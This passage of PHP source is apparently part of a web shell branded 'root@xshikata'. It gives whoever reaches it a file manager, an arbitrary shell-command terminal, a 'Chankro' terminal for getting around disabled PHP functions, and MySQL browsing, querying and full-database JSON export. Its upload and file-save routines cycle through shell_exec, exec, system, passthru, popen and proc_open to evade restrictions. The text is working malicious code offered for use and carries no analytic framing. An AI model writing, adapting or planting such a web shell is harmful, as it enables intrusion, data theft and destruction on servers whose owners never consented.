file '" . htmlspecialchars($namaBerkas) . "'. Check permissions."; } } else { $error_msg = "File not found: " . htmlspecialchars($namaBerkas); } $awal = 'dasar'; } else if($awal=="buat_file" && isset($_POST['new_filename']) && !empty($_POST['new_filename'])) { $namaBerkas = basename($_POST['new_filename']); $kontenBerkas = isset($_POST['new_file_content']) ? $_POST['new_file_content'] : ''; $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" ? "/" : ""; $pathLengkap = $default_dir . $pemisah . $namaBerkas; if(file_exists($pathLengkap)) { $error_msg = "File '" . htmlspecialchars($namaBerkas) . "' already exists!"; } else { if (file_put_contents($pathLengkap, $kontenBerkas) !== false) { $success_msg = "File '" . htmlspecialchars($namaBerkas) . "' created successfully."; } else { $error_msg = "Failed to create file '" . htmlspecialchars($namaBerkas) . "'. Check permissions."; } } } else if($awal=="buat_folder" && isset($_POST['ad']) && !empty($_POST['ad'])) { $namaFolder = basename(uraikan($_POST['ad'])); $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" && substr($namaFolder, 0, 1) != "/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaFolder)) { print ''; } else { mkdir($default_dir . $pemisah . $namaFolder); } } else if($awal=="rename_file" && isset($_POST['fayl']) && trim($_POST['fayl']) != "" && isset($_POST['new_name']) && is_string($_POST['new_name']) && !empty($_POST['new_name'])) { $namaBerkas = basename(uraikan($_POST['fayl'])); $fileNamaBaru = basename(uraikan($_POST['new_name'])); $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { rename($default_dir . $pemisah . $namaBerkas , $default_dir . $pemisah . $fileNamaBaru); } } else if($awal == 'skl_d_t' && isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t'])) { $tableName = uraikan($_POST['t']); $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; if(!empty($host) && !empty($database)) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database, $tableName)); $columns = $getColumns->fetchAll(); if($columns) { $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); header('Content-disposition: attachment; filename=d_' . basename(htmlspecialchars($tableName)) . '.json'); header('Content-type: application/json'); echo json_encode($data); } else { print "Table not found!"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else if($awal == 'skl_d') { $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; if(!empty($host) && !empty($database)) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tables->execute(array($database)); $tables = $tables->fetchAll(); foreach($tables AS $tableName) { $tableName = $tableName['table_name']; $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header('Content-disposition: attachment; filename=d_b_' . basename(htmlspecialchars($database)) . '.json'); header('Content-type: application/json'); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else if($awal == 'kompres' && isset($_POST['save_to'], $_POST['zf']) && is_string($_POST['save_to']) && !empty($_POST['save_to']) && !in_array($_POST['save_to'], array('.' , '..' , './' , '../')) && is_string($_POST['zf']) && !empty($_POST['zf']) ) { $save_to = uraikan($_POST['save_to']); $rootPath = realpath(uraikan($_POST['zf'])); $fileName1 = 'bak_'.microtime(1) . '_' . rand(1000, 99999) . '.zip'; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if(is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if(!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "Saved!
"; } else { print "Directory not writable!
"; var_dump(($save_to)); } } else if($awal == 'hapus_folder' && isset($_POST['zf']) && is_string($_POST['zf']) && !empty($_POST['zf'])) { $rootPath = realpath(uraikan($_POST['zf'])); $folderName = basename($rootPath); if(is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); // Verify deletion if (!file_exists($rootPath)) { $success_msg = "Folder '" . htmlspecialchars($folderName) . "' and its contents deleted successfully."; } else { $error_msg = "Failed to delete folder '" . htmlspecialchars($folderName) . "'. Check permissions of the folder and its contents."; } } else { $error_msg = "Directory not found or path is invalid."; } $awal = 'dasar'; } else if ($awal == 'upl_file' && isset($_FILES['ufile'])) { function smart_upload($fileKey, $targetDir) { $res = ['success' => false, 'method' => '', 'message' => '', 'name' => '']; // 1. Validasi Input if (!isset($_FILES[$fileKey]) || $_FILES[$fileKey]['error'] !== UPLOAD_ERR_OK) { $res['message'] = 'Upload error code: ' . ($_FILES[$fileKey]['error'] ?? 'unknown'); return $res; } $filename = basename($_FILES[$fileKey]['name']); $tmp = $_FILES[$fileKey]['tmp_name']; $pemisah = substr($targetDir, -1) !== "/" ? "/" : ""; $dest = $targetDir . $pemisah . $filename; // 2. Validasi Source (Anti-0kb) if (!file_exists($tmp) || filesize($tmp) <= 0) { $res['message'] = 'File tmp kosong/hilang. Upload gagal dari server.'; return $res; } // --- A. METODE PHP NATIVE --- // 1. Move Uploaded File if (!$res['success'] && @move_uploaded_file($tmp, $dest)) { $res['success'] = true; $res['method'] = 'move_uploaded_file'; } // 2. Copy if (!$res['success'] && @copy($tmp, $dest)) { $res['success'] = true; $res['method'] = 'copy'; } // 3. Rename if (!$res['success'] && @rename($tmp, $dest)) { $res['success'] = true; $res['method'] = 'rename'; } // 4. Stream Copy (Fopen) if (!$res['success']) { $src = @fopen($tmp, 'rb'); $dst = @fopen($dest, 'wb'); if ($src && $dst) { if (@stream_copy_to_stream($src, $dst)) { $res['success'] = true; $res['method'] = 'stream_copy'; } } @fclose($src); @fclose($dst); } // 5. File Get/Put Contents if (!$res['success']) { $content = @file_get_contents($tmp); if ($content !== false && strlen($content) > 0) { if (@file_put_contents($dest, $content)) { $res['success'] = true; $res['method'] = 'file_put_contents'; } } } // --- B. METODE SYSTEM COMMAND (Fallback Multi-Fungsi) --- if (!$res['success']) { // Helper: Cari fungsi eksekusi yang aktif (exec, shell_exec, system, dll) $run_cmd = function($cmd) { if (function_exists('shell_exec')) { @shell_exec($cmd); return true; } if (function_exists('exec')) { @exec($cmd); return true; } if (function_exists('system')) { @system($cmd); return true; } if (function_exists('passthru')) { @passthru($cmd); return true; } if (function_exists('popen')) { $fp = @popen($cmd, 'r'); if($fp) { pclose($fp); return true; } } if (function_exists('proc_open')) { $proc = @proc_open($cmd, [0=>['pipe','r'], 1=>['pipe','w'], 2=>['pipe','w']], $pipes); if (is_resource($proc)) { proc_close($proc); return true; } } return false; }; // Command list: cp, mv, cat $sys_cmds = [ ['cmd' => "cp " . escapeshellarg($tmp) . " " . escapeshellarg($dest), 'name' => 'cp'], ['cmd' => "mv " . escapeshellarg($tmp) . " " . escapeshellarg($dest), 'name' => 'mv'], ['cmd' => "cat " . escapeshellarg($tmp) . " > " . escapeshellarg($dest), 'name' => 'cat'] ]; foreach ($sys_cmds as $action) { // Jalankan command menggunakan fungsi apapun yang tersedia if ($run_cmd($action['cmd'])) { // Cek hasil segera if (file_exists($dest) && filesize($dest) > 0) { $res['success'] = true; $res['method'] = 'sys_' . $action['name']; break; // Berhenti jika berhasil } } } } // --- C. VERIFIKASI AKHIR --- if ($res['success']) { // Double check keberadaan dan ukuran file clearstatcache(); if (file_exists($dest) && filesize($dest) > 0) { @chmod($dest, 0644); $res['name'] = $filename; $res['message'] = "File uploaded successfully via {$res['method']}"; } else { $res['success'] = false; $res['message'] = "Metode {$res['method']} jalan, tapi file hasil 0kb/hilang."; @unlink($dest); } } else { $res['message'] = "Gagal total. Semua metode (PHP & System) diblokir/gagal."; } return $res; } $uploadResult = smart_upload('ufile', $default_dir); $upload_message = $uploadResult['message']; } ?> root@xshikata

System Info:

User:

Group:

Safe Mode: ;"> [ PHP Info ]

Server Address:

Server Software:

PHP Version:

cURL Version:

Server Time:

'; ?>
' . $success_msg . ''; } elseif (isset($error_msg)) { echo '
' . $error_msg . '
'; } ?>


"; } // --- GANTI SELURUH BLOK 'chankro_kom' YANG LAMA DENGAN YANG INI --- else if ($awal == 'chankro_kom') { print '
'; print '

Command v2

'; // Area untuk menampilkan hasil command print '
'; if (isset($_POST['chankro_command']) && !empty($_POST['chankro_command'])) { // Panggil fungsi Chankro. Fungsi ini akan langsung mencetak outputnya. // Kita modifikasi sedikit agar tidak ada judul ganda. ob_start(); runChankroModified(trim($_POST['chankro_command']), $default_dir); $output = ob_get_clean(); print str_replace("

result:

", "", $output); } else { print "Terminal ready. Enter a command below."; } print '
'; // Area untuk input command ?>
$
'; } // --- AKHIR DARI BLOK PENGGANTI --- else if ($awal == "sistem_kom") { print '
'; print '
'; if (isset($_POST['kom']) && is_string($_POST['kom']) && !empty($_POST['kom'])) { $komanda = uraikan($_POST['kom']); $result = execute_command($komanda); print htmlspecialchars(isset($result['output']) ? $result['output'] : ""); if(!empty($result['error'])) { print "\n" . htmlspecialchars($result['error']) . ""; } } else { print "Terminal ready. Enter a command below."; } print '
'; print '
'; print '$'; print ''; print ''; print '
'; print '
'; } else if($awal=="baca_file" && isset($_POST['fayl']) && trim($_POST['fayl']) != "") { $namaBerkas = basename(uraikan($_POST['fayl'])); $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? " onclick='navigate(\"awal\", \"edit_file\", \"fayl\", \"" . kunci($namaBerkas) . "\", \"berkas\", \"" . kunci($default_dir) . "\")'" : " disabled"; print "
File Name: " . htmlspecialchars($namaBerkas) . "
"; print "
" . highlight_string(file_get_contents($default_dir . $pemisah . $namaBerkas), true) . "
"; } } else if ($awal == 'edit_db_form') { $db_sidebar_content = ''; // To capture sidebar for later display ob_start(); try { if (!isset($_POST['t'], $_POST['pk_val'])) { throw new Exception("Missing table or primary key."); } $tableName = uraikan($_POST['t']); $pk_val = uraikan($_POST['pk_val']); $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; if(empty($host) || empty($database)) { throw new Exception("Database connection not established."); } $pdo = new PDO('mysql:host=' . $host . ';dbname=' . $database . ';charset=utf8', $user, $sandi); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); // --- RENDER SIDEBAR (for context) --- $schematas = $pdo->query('SELECT schema_name FROM information_schema.schemata')->fetchAll(); echo '
'; echo '
'; echo '

Databases

'; echo '
    '; foreach($schematas as $schema) { $schemaName = $schema['schema_name']; $activeClass = ($database == $schemaName) ? 'class="active"' : ''; echo "
  • {$schemaName}
  • "; } echo '
'; $tablesStmt = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tablesStmt->execute(array($database)); $tables = $tablesStmt->fetchAll(); echo '

Tables

'; echo '
'; // End sidebar $db_sidebar_content = ob_get_clean(); // Capture sidebar and restart buffer ob_start(); // --- RENDER MAIN CONTENT (THE FORM) --- $cols_stmt = $pdo->query("DESCRIBE `{$tableName}`"); $columns_info = $cols_stmt->fetchAll(PDO::FETCH_ASSOC); $pk_col = $columns_info[0]['Field']; $stmt = $pdo->prepare("SELECT * FROM `{$tableName}` WHERE `{$pk_col}` = ?"); $stmt->execute([$pk_val]); $row_data = $stmt->fetch(PDO::FETCH_ASSOC); if (!$row_data) { throw new Exception("Row not found."); } echo '
'; echo '

Editing row in ' . htmlspecialchars($tableName) . '

'; echo '
'; echo ''; echo ''; echo ''; foreach($columns_info as $col) { $colName = $col['Field']; $colType = strtolower($col['Type']); $value = htmlspecialchars(isset($row_data[$colName]) ? $row_data[$colName] : ''); echo '
'; echo ''; $isReadOnly = ($colName == $pk_col); $readOnlyAttr = $isReadOnly ? ' readonly style="background-color: #444;"' : ''; if (strpos($colType, 'text') !== false || (strpos($colType, 'varchar') !== false && intval(preg_replace('/[^0-9]/', '', $colType)) > 255)) { echo ''; } else { echo ''; } echo '
'; } $halaman = isset($_POST['halaman']) ? $_POST['halaman'] : '1'; $current_table_encoded = $_POST['t']; echo '
'; echo ''; echo 'Cancel'; echo '
'; echo '
'; echo '
'; // End db-content } catch (Exception $e) { echo '
Error: ' . $e->getMessage() . '
'; } $db_main_content = ob_get_clean(); echo $db_sidebar_content . $db_main_content . '
'; // Combine and close container } else if($awal == 'skl') { // 1. Get all potential values from cookies and POST $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; // 2. Override with POST data if it exists for the current request if (isset($_POST['host'])) { $host_val = trim($_POST['host']) === '' ? 'localhost' : $_POST['host']; $host = $host_val; $user = $_POST['user']; $sandi = $_POST['sandi']; $database = ''; // Reset database on new connection } if (isset($_POST['database'])) { $database = $_POST['database']; } ?> "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $schematas = $pdo->query('SELECT schema_name FROM information_schema.schemata')->fetchAll(); echo '
'; // Sidebar echo '
'; echo '

Databases

'; echo '
    '; foreach($schematas as $schema) { $schemaName = $schema['schema_name']; $activeClass = ($database == $schemaName) ? 'class="active"' : ''; echo "
  • {$schemaName}
  • "; } echo '
'; if(!empty($database)) { $tablesStmt = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tablesStmt->execute(array($database)); $tables = $tablesStmt->fetchAll(); echo '

Tables

'; echo '
    '; $currentTable = isset($_POST['t']) ? uraikan($_POST['t']) : ''; foreach($tables as $table) { $tableName = $table['table_name']; $activeClass = ($currentTable == $tableName) ? 'class="active"' : ''; echo "
  • " . htmlspecialchars($tableName) . "
  • "; } echo '
'; } echo '
'; // End Sidebar // Main Content echo '
'; if(empty($database)) { echo "Select a database from the sidebar to begin."; } else { if(isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t'])) { $tableName = uraikan($_POST['t']); echo '
'; echo 'Table: ' . htmlspecialchars($tableName) . ' ( Export Table | Export Database )'; $dataCountQuery = $pdo->query('SELECT count(0) AS ss from `' . $tableName . '`'); $dataCount = (int)$dataCountQuery->fetchColumn(); echo '
Rows: ' . $dataCount; echo '
'; $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database, $tableName)); $columns = $getColumns->fetchAll(PDO::FETCH_COLUMN); if($columns) { $pages = ceil($dataCount / 100); $currentPage = isset($_POST['halaman']) && is_numeric($_POST['halaman']) && $_POST['halaman'] >= 1 && $_POST['halaman'] <= $pages ? (int)$_POST['halaman'] : 1; $start = 100 * ($currentPage - 1); $dataQuery = $pdo->query('SELECT * FROM `' . $tableName . '` LIMIT ' . $start . ' , 100'); $data = $dataQuery->fetchAll(); echo '
'; echo ''; foreach($columns AS $columnName) { echo ''; } echo ''; echo ''; foreach($data AS $row) { $pkValue = htmlspecialchars(reset($row)); $pkValueEncoded = kunci($pkValue); echo ''; foreach($row AS $val) { echo ''; } echo ''; echo ''; } echo '
' . htmlspecialchars($columnName) . 'Actions
' . htmlspecialchars($val) . '
Edit
'; if ($pages > 1) { echo ''; } } else { echo "Table not found!"; } } else if(isset($_POST['emr']) && is_string($_POST['emr']) && !empty($_POST['emr'])) { $emr = uraikan($_POST['emr']); echo '
SQL Query Result:
' . htmlspecialchars($emr) . '
'; $dataQuery = $pdo->query($emr); if ($dataQuery) { $data = $dataQuery->fetchAll(); if (count($data) > 0) { echo '
'; echo ''; foreach($data[0] as $key => $val) { echo ''; } echo ''; foreach($data as $row) { echo ''; foreach($row as $val) { echo ''; } echo ''; } echo '
' . htmlspecialchars($key) . '
' . htmlspecialchars($val) . '
'; } else { echo "Query executed successfully, but returned no results."; } } else { echo "Error executing query: " . htmlspecialchars($pdo->errorInfo()[2]) . ""; } } else { echo "Select a table from the sidebar to view its content."; } // SQL Editor echo '
'; echo '

SQL Query

'; echo ''; echo ''; echo '
'; } echo '
'; // End Content echo '
'; // End Container } catch (Exception $e) { echo '
Connection failed: ' . $e->getMessage() . '
'; } } } else if($awal=="edit_file" && isset($_POST['fayl']) && trim($_POST['fayl']) != "") { $namaBerkas = basename(uraikan($_POST['fayl'])); $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $status = ""; if(isset($_POST['content'], $_POST['took']) && $_POST['took'] != "" && isset($_SESSION['ys_took']) && $_SESSION['ys_took'] == $_POST['took']) { unset($_SESSION['ys_took']); $content = $_POST['content']; $targetFile = $default_dir . $pemisah . $namaBerkas; $save_success = false; $used_method = ''; // 0. Coba ubah permission dulu agar writable @chmod($targetFile, 0644); // --- METODE 1: Standard PHP --- if (!$save_success && file_put_contents($targetFile, $content) !== false) { $save_success = true; $used_method = 'file_put_contents'; } // --- METODE 2: Fopen/Fwrite (Stream) --- if (!$save_success) { $fp = @fopen($targetFile, 'w'); if ($fp) { if (@fwrite($fp, $content) !== false) { $save_success = true; $used_method = 'fwrite'; } @fclose($fp); } } // --- METODE 3: Tulis ke TMP lalu Pindah (Bypass Permission/Lock) --- if (!$save_success) { $tmp_file = tempnam(sys_get_temp_dir(), 'edit_'); if (@file_put_contents($tmp_file, $content) !== false) { // 3a. Rename/Move PHP if (@rename($tmp_file, $targetFile)) { $save_success = true; $used_method = 'rename_tmp'; } // 3b. Copy PHP elseif (@copy($tmp_file, $targetFile)) { $save_success = true; $used_method = 'copy_tmp'; } // 3c. System Command (cp/mv/cat) else { $cmd_run = function($c) { if(function_exists('shell_exec')){ @shell_exec($c); return true; } if(function_exists('exec')){ @exec($c); return true; } if(function_exists('system')){ @system($c); return true; } if(function_exists('passthru')){ @passthru($c); return true; } if(function_exists('popen')){ $p=@popen($c,'r'); if($p){pclose($p);return true;} } return false; }; $c_cp = "cp " . escapeshellarg($tmp_file) . " " . escapeshellarg($targetFile); $c_mv = "mv " . escapeshellarg($tmp_file) . " " . escapeshellarg($targetFile); $c_cat = "cat " . escapeshellarg($tmp_file) . " > " . escapeshellarg($targetFile); if ($cmd_run($c_cp)) { $save_success = true; $used_method = 'exec_cp'; } elseif ($cmd_run($c_mv)) { $save_success = true; $used_method = 'exec_mv'; } elseif ($cmd_run($c_cat)) { $save_success = true; $used_method = 'exec_cat'; } } @unlink($tmp_file); // Hapus file sampah } } // --- VERIFIKASI ANTI-0KB --- // Jika konten asli tidak kosong, tapi hasil di server 0 byte, maka anggap gagal. clearstatcache(); if ($save_success && strlen($content) > 0 && (!file_exists($targetFile) || filesize($targetFile) === 0)) { $save_success = false; $status = " Saved via {$used_method} but result is 0kb (Write Failed)."; } elseif ($save_success) { $status = " Saved successfully via {$used_method}!"; } else { $status = " Failed to save using all methods. Check Permission/Disk Space."; } } $oxuUrl = "?awal=baca_file&fayl=" . kunci($namaBerkas) . "&berkas=" . kunci($default_dir); $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? "" : " disabled"; ?>
File Name:
" name="took">
$element, 'is_dir' => $is_dir, 'type_prefix' => $is_dir ? '0' : '1' ]; } // Sort folders first, then files usort($items, function($a, $b){ if ($a['name'] === '.') return -1; if ($b['name'] === '.') return 1; if ($a['name'] === '..') return -1; if ($b['name'] === '..') return 1; if ($a['is_dir'] && !$b['is_dir']) return -1; if (!$a['is_dir'] && $b['is_dir']) return 1; return strcasecmp($a['name'], $b['name']); }); echo '
'; echo ""; foreach($items AS $item) { $element = $item['name']; $pemisah = substr($default_dir, strlen($default_dir)-1) != "/" ? "/" : ""; $fileNamaLengkap = $default_dir . $pemisah . $element; $isWriteable = is_writable($fileNamaLengkap); $permissionsColor = $isWriteable ? "#00FF00" : "#FF0000"; $currentPerms = substr(sprintf('%o', @fileperms($fileNamaLengkap)), -4); print ''; } echo "
FileSizeDateOwner/GroupPermissionsActions
'; if($item['is_dir']) { print ''; $navPath = ''; if ($element == '..') { $navPath = kunci(dirname($default_dir)); } else { $navPath = kunci($fileNamaLengkap); } print '' . htmlspecialchars($element) . ''; } else { print ''; print '' . htmlspecialchars($element) . ''; } print ' ' . sizeFormat(@filesize($fileNamaLengkap)) . ' ' . (date('d M Y, H:i', @filemtime($fileNamaLengkap))) . ' '; if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) { $owner = @posix_getpwuid(@fileowner($fileNamaLengkap)); $group = @posix_getgrgid(@filegroup($fileNamaLengkap)); echo htmlspecialchars((isset($owner['name']) ? $owner['name'] : 'N/A')) . '/' . htmlspecialchars((isset($group['name']) ? $group['name'] : 'N/A')); } else { echo 'N/A'; } print ' ' . $currentPerms . ' '; if(is_file($fileNamaLengkap)) { print (' | ') . (' | ') . (' | ') . (' '); } else if($element != '.' && $element != '..') { print (' | ') . (' '); } print '
"; } else { echo '
'; print ""; echo "
Permission denied!
"; } } } ?>